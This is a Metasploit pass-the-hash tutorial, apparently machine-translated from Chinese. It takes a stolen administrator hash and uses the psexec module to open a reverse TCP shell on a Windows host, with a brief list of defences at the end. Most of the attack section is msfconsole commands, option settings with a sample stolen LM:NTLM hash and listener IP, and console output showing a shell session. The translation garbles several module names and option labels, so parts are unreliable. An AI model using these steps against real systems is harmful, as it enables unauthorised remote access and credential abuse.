Analysis and defense of passing hash intrusion technology

Source: Hack01 @ Live! Cn

Preface
~~~~~~
It is a common topic for security personnel to prevent passwords from being obtained maliciously due to complicated password policies. In this article, I will not describe how to crack the system password through hash and storage information. This article will focus on demonstrating the smooth penetration into the target system through the stolen password hash. I will also introduce how to detect and prevent such intrusion.

Hash at the packet level
~~~~~~~~~~~~~~~~~~~~
Each time a Windows account is created, the password is converted into a hash password. Hash is an encryption function that accepts a string of any size as the result of data. It uses the mathematical encryption function and returns a fixed-size string. When you try to access a host protected by user name and password verification, the computer will calculate the hash function of the password you entered and submit it to the host, in this way, you can obtain authentication from a database.

Now, consider the alternative solution. If we manually establish a connection with the host, but our user name and password are not correct, is the hash of Our administrator user name and password stolen? What we do is to obtain the management permission of the host. Remember that all hosts are concerned with receiving a matched hash value. This means that you do not need to execute the password of the one-way hash function. You only need to provide hash, which is the basis for this intrusion.

Use Metasploit to pass the hash
~~~~~~~~~~~~~~~~~~~~~~~
To perform this task, we will use a victim machine that has stolen the hash. To perform this attack, we need two things. First, we will hash the administrator user that needs to be stolen. Currently, underground organizations are using many different methods to obtain the hash value of passwords. Here, we need to use Metasploit for intrusion.

Metasploit is a free penetration testing framework provided by HD Moore. At the same time, here we use BT4 Linux Live, which can be from http://www.backtrack-linux.org /? Lang = zh. Then, you will find that Metasploit is in the/pentest/exploits/framework3 directory.

As we steal the hash value and the Metasploit at hand, we can start to act. Start the terminal and access the/pentest/exploits/framework3 directory, and then type "./msfconsole" to start the console as Metasploit.

Root @ czy :~ # Cd/pentest/exploits/framework3/
Root @ czy:/pentest/exploits/framework3 #./msfconsole
Msf>

Metasploit is a framework. The execution of various modules depends on the behavior. In this case, we will use the ipvxec module. Psexec is a common tool (not specific to Metasploit) used to execute processes and output redirection data streams on a remote system. To use this module, type "use windowssmbw.xec" and press Enter. Then, the prompt in Shell changes to reflect that the module is in use.

Msf> use windows/smb/javasxec
Msf> exploit (export xec)>

Then, we must set the payload. Once the account and hash have provided us with the appropriate severe identity payload, we will use ipvxec for execution. In this case, there are often a lot of malicious intentions, rather than a specific solution just published. We need to execute a Shell command that can be used to execute a lot of annoying and repetitive commands. One of the more effective methods is to use reverse TCP Shell. To use this payload, type "set payload windows/shell_reverse_tcp ".

Msf exploit (export xec)> set payload windows/shell_reverse_tcp
Payload => windows/shell_reverse_tcp
Msf exploit (export xec)>

To use this module and the payload, We have to configure some options. To see these options, you can type "show options" and press the Enter key.

Msf exploit (export xec)> show options

Module options:

Name Current Setting Required Description
--------------------------------------
RHOST yes The target address
RHOST 445 yes Set the SMB service port
SMBPass no The password for the specified username
SMBUser Administrator yes The username to authenticate

Payload option (windows/shell_reverse_tcp ):

Name Current Setting Required Description
--------------------------------------
EXITFUNC process yes Exit technique: seh, thread, process
LHOST yes The listen address
LHOST 4444 yes The listen port

Exploit target:
Id Name
------
0 Automatic

Msf exploit (export xec)>

To configure options, we need to use the syntax "set [Option name] [value]". The value should be set:

· RHOST-IP address of the victim
· SMBPass-the victim's stolen hash
· SMBUser-User Name of the victim
· LHOST-IP address of your intrusion operation

In most cases, only four options need to be configured, and other options can use the default configuration.

Msf exploit (export xec)> show options

Module options:

Name Current Setting Required Description
--------------------------------------
RHOST 192.168.0.20 yes The target address
RHOST 445 yes Set the SMB service port
SMBPass e52cac67419a9a224a3b424f3fa6cb6d: 8846F7EAEE8FB117AD06BDD830B7586C no The password for the specified username
SMBUser Administrator yes The username to authenticate

Payload option (windows/shell_reverse_tcp ):

Name Current Setting Required Description
--------------------------------------
EXITFUNC process yes Exit technique: seh, thread, process
LHOST 192.168.0.128 yes The listen address
LHOST 4444 yes The listen port

Exploit target:
Id Name
------
0 Automatic

Msf exploit (export xec)>

By now, all the preparations have been completed and we can execute the task. To do this, just type "exploit" and press the Enter key. If it succeeds, you will see the following information, which is a good Windows command Shell. Now we do not need any administrator user password for control.

Msf exploit (export xec)> exploit

[*] Started reverse handler on 192.168.0.128: 4444
[*] Connecting to the server...
[*] Authenticating as user admin...
[*] Uploading payload...
[*] Created ibpwnoK.exe...
[*] Binding to export abb81-9844-35f1-ad32-98f038001003: 2.0 @ ncacn_np: 192.168.0.20 [svcctl]...
[*] Bound to maid abb81-9844-35f1-ad32-98f038001003: 2.0 @ ncacn_np: 192.168.0.20 [svcctl]...
[*] Obtaining a service manager handle...
[*] Creating a new service (tlfgTpTb-"MBrTRKuKR ")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting ibpwnoK.exe...
[*] Command shell session 1 opened (192.168.0.128: 4444-> 192.168.0.20: 1063) at Sun Jul 25 11:20:59-0400 2010

(C) Copyright 1985-2001 Microsoft Corp.

C: WINDOWSsystem32>

Defense transfer hash
~~~~~~~~~~~~~~
In the process of identity authentication, the nature of passing hash is hard to detect and prevent, but there are some things you can do:

· Intrusion Detection System Monitoring-an IDS system cannot detect the features of hash intrusion by attackers, because it usually looks like a normal sequence verification. You may be able to detect the attack and the attacker has obtained the access permission. For example, in our instance, you may not see an alarm on Hash passing on the victim's machine, and Danny may see a warning that mongoxec creates a Shell. When similar information is detected, the system responds appropriately to determine what happened.
· Isolate sensitive systems-all machines that contain sensitive data should be isolated. Access can be restricted by using appropriate vrouters and firewall configurations. Only trusted hosts can access the service. This will prevent attempts on different machines to access a sensitive system user through the Hash technology.
· Two-factor authentication-password-based authentication is a traditional authentication method. In addition to passwords, you also need to consider other factors, such as smart cards and biometric identification. By combining these two factors, you can block any system user that can only have one password or stolen hash.
· Restrict management access-the more user accounts there are, the higher the probability of Management permissions and theft of hash with network breakdown. Regular audits should always be conducted to determine whether each user has super administrator permissions.

Conclusion
~~~~~
It is easy to complete intrusion operations by hashing, which is critical to the victim's machines. As you can see in this article, operations and motivations can completely paralyze the target infrastructure. We hope to have a strategic understanding of intrusion, detection, and prevention! If you still have issues with details, please write a letter to my e-mail (Hack01 [at] Live.cn ).